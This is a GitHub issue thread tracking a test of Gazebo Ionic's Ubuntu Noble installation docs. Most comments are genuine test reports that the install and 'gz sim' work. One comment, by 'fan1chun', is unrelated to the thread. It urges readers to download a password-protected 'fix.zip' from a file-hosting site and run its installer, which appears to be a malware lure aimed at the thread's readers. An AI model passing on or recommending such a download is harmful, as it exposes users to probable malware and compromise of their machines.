### ISSUE TITLE
docs: install_ubuntu

### ISSUE THREAD

**Issue by azeey-test** [gazebosim/gazebo_test_cases#1702]
## Configuration

* buildType: Binary
* os: Ubuntu Noble

## Links

* [Live](https://gazebosim.org/docs/ionic/install_ubuntu)
* [Source](https://github.com/gazebosim/docs/tree/master/ionic/install_ubuntu.md)

**Comment by fan1chun** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by bperseghetti** [comment]
I'm available to test.

**Comment by utkuesen** [comment]
I tested it and installation worked.
I also tested to run "gz sim" command then open an example project which is "NAO Joint Control". It was also working.

**Comment by bperseghetti** [comment]
Works on a cleanly installed native 24.04 system as well, we just need to remember to remove this line https://github.com/gazebosim/docs/blob/3e075cdf75464d1610c38ba069a3a8970e78e720/ionic/install_ubuntu.md?plain=1#L20 once Ionic is released.
